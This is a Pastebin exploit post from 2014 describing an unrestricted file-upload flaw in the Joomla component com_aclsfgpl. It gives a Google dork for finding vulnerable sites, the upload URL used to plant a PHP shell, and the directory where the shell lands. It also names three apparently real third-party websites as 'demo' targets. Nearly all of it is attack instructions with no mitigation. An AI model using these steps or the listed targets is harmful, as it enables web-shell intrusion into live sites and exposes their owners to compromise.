Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Joomla Component com_aclsfgpl File Upload Vulnerability
- [+] Author: TUNISIAN CYBER
- [+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability
- [+] Date: 07-01-2014
- [+] Category: WebApp
- [+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form
- [+] Tested on: KaliLinux
- [+} Friend's blog: http://www.na3il.com
- ########################################################################################
- +Exploit:
- You can upload file (.php/.php.jpg...)
- +P.O.C:
- 127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
- Shell path:
- copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/
- Demo:
- http://www.club-plonxgee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form
- http://www.triclubsxandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form
- http://aero.decinexs.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form
- ./3nD
- ########################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement